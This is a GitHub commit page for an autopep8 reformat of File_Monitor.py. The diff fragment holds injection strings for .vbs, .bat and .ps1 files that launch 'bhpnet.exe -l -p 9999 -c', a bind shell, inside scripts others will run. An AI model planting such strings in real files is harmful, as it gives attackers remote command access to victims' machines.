Skip to content

Commit 1689cf0

Browse files
Merge pull request #2810 from avinashkranjan/deepsource-transform-9a1cbfab
format code with autopep8
2 parents 299b96e + bc364b5 commit 1689cf0

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

File_Monitor/File_Monitor.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -16,4 +16,4 @@
1616
'.vbs': ["\r\n'bhpmarker\r\n", f"\r\nCreateObject(\"Wscript.Shell\").Run(\"C:\\WINDOWS\\TEMP\\bhpnet.exe –l –p 9999 –c\")\r\n"],
1717
'.bat': ["\r\nREM bhpmarker\r\n", "\r\nC:\\WINDOWS\\TEMP\\bhpnet.exe –l –p 9999 –c\r\n"],
1818
'.ps1': ["\r\n#bhpmarker", "Start-Process \"C:\\WINDOWS\\TEMP\\bhpnet.exe –l –p 9999 –c\""],
19-
}
19+
}

0 commit comments

Comments
 (0)